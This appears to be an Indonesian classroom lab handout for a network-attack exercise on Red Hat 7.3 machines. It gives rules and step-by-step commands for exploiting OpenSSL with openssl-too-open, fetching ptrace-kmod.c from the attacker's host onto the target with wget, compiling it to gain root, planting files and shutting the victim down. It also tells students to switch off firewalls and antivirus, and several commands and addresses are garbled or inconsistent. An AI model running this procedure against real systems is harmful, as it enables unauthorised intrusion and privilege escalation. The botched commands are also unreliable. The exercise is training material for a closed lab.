Ketentuan TR
- dual boot desktop
- sistem operasi yang digunakan RedHat7.3
- tools yang dipakai openssl-too-open dan ptrace-kmod.c
- ip address yang digunakan kelas C (192.168.212.xxx)
- yakinkan firewall / anti virus dalam status off (not recommended)
- yakinkan tools yang akan digunakan untuk menyerang/menyusup sudah terinstall dan dapat bekerja 100%
Rule
- diperkenankan max 2 kali tukar-menukar password, lebih dari itu tidak dinilai
- diperbolehkan hanya menyisipkan file pada komputer target, tidak boleh melakukan aksi yang lain. karena dapat merugikan orang lain dan diri sendiri
- apabila ada tindakan lain selain yang tercantum pada rule 2, nilai dipotong setengah
- yakinkan port-port yang aktif adalah FTP, SSH, TELNET, HTTP
- lakukan perintah nmap untuk melihat port-port yang aktif pada komputer sendiri maupun komputer orang lain
- aturan tambahan akan ditambahkan jika memang diperlukan
Panduan penyerangan pada linux Red Hat7.3
- pastikan paket openssl-too-open sudah terinstall pada komputer linux anda. kalo belum ada silahkan unduh dari komputer source yang sudah terdapat paket tersebut. gunakan perintah wget pada console/terminal. tetapi sebelumnya, pastikan bahwa di komputer linux anda service httpnya sudah aktif. perintahnya: wget http://alamat_ip_komp_source/file_yg_mau didownload /direktori_yg mau disimpan. contohnya : wget http://192.168.32.1/openssl-too-open.tar.gz /home
- pastikan file openssl-too-open.tar.gz yang tadi di unduh sudah ada di direktori home. gunakan perintah ls -l
- masuk ke direktori home perintahnya cd /home, lalu ekstrak file tersebut. gunakan perintah: tar -zxvf openssl-too-open.tar.gz untuk mengekstrak
- cek hasil ekstrakan tersebut, gunakan perintah ls -l
- masuk ke direktori openssl-too-open, gunakan perintah cd openssl-too-open
- install paket tersebut, gunakan perintah make
- lakukan scanning ke komputer target, gunakan perintah ./openssl-scanner -C alamat_ip_target
- masuk ke komputer target, gunakan perintah telnet alamat_ip_target
- setelah itu, jalankan openssl, gunakan perintah ./openssl-too-open -a 0x0b -v ip_komp_target
- cek hak akses anda, gunakan perintah whoami
- kalau hak akses anda belum root pada komputer target, ubah hak akses menjadi root. masuk ke direktori tmp. gunakan perintah cd /tmp
- unduh file ptrace-kmod.c dari komputer kita dan letakkan file tersebut di direktori tmp pada komputer target. gunakan perintah wget http://alamat_ip_anda/ptrace-kmod.c /tmp
- eksekusi file tersebut, gunakan perintah gcc ptrace-kmod.c
- ls -l untuk melihat hasil eksekusi tersebut. pastikan ada file a.out
- rubah permission hak akses a.out. gunakan perintah chmod +x a.out atau chmod 777 a.out
- jalankan file a.out, gunakan perintah ./a.out
- cek status anda, gunakan perintah whoami. kalau sudah root, silahkan sisipkan file di direktori yang kalian inginkan
Melakukan SSH pada Red Hat7.3
kosyarat:
- 2 buah PC yang sudah diinstall Red Hat7.3
- PC tujuan yang akan diserang menggunakan teknik SSH harus diinstal webserver (mis: Apache/Wampserver/AppServNetwork)
- Apache/Wampserver/AppServNetwork digunakan PC penyerang untuk mendownload file openssl-too-open.tar.gz dari PC korban
Panduan untuk mengambil alih komputer korban
1. jalankan linux kita.Pastikan eth0 pada komputer 1 memiliki IP 192.168.212.xxx
Pastikan eth0 pada komputer 2 memiliki IP 192.168.212.xxx
2. Cek apakah target kita menggunakan sistem operasi RedHat 7 ?
Bila ya, kita dapat melanjutkan proses dibawah ini.
3. Pertama kita harus mempunyai sebuah tools bernama openssl-too-open.
4. Bila kita tidak mempunyai tools ini, kita dapat mendownloadnya pada komputer yang menyediakannya. Contoh 192.168.212.212 menyediakan resource
5. Ketikkan # wget http://192.168.212.121/openssl-too-open.tar.gz
6. Perlu diperhatikan bahwa harus terdapat web server pada computer download.
File openssl-too-open.tar.gz harus berada pada folder htdoc atau /www/html pada folder web server itu sendiri.
7. Extraklah file tersebut dengan cara mengetikkan:
# tar –zxvf openssl-too-open.tar.gz
8. Setelah di exkstrak masuk ke direktori Openssl-too-open.
Silakan menginstal pada directory yang Anda inginkan, setelah itu silakan diinstal dengan mengetikkan:
# make
9. Sekarang, kita akan meninjau (scanning) komputer target (192.168.212.2) mengetikkan:
# ./openssl-scanner –d 192.168.212.2
10. Kita akan coba memasuki komputer target dengan memasuki port yang ada kemungkinan terbuka. Kita coba port 80 (WEB) dengan menggunakan SSH dengan mengetikkan:
# ssh192.168.6.2 80
akan ada konfirmasi password komputer korban, kita masukkan password yang telah kita ketahui.
11. Kita bisa melakukan wall ke komputer korban
ketikkan:
wall sing penting conect
Maka pesan yg dikirim komputer 1 tampak di komputer 2
kita juga bisa mematikan komputer korban dengan cara:
reboot (melakukan restart)
init 0 (mematikan komputer)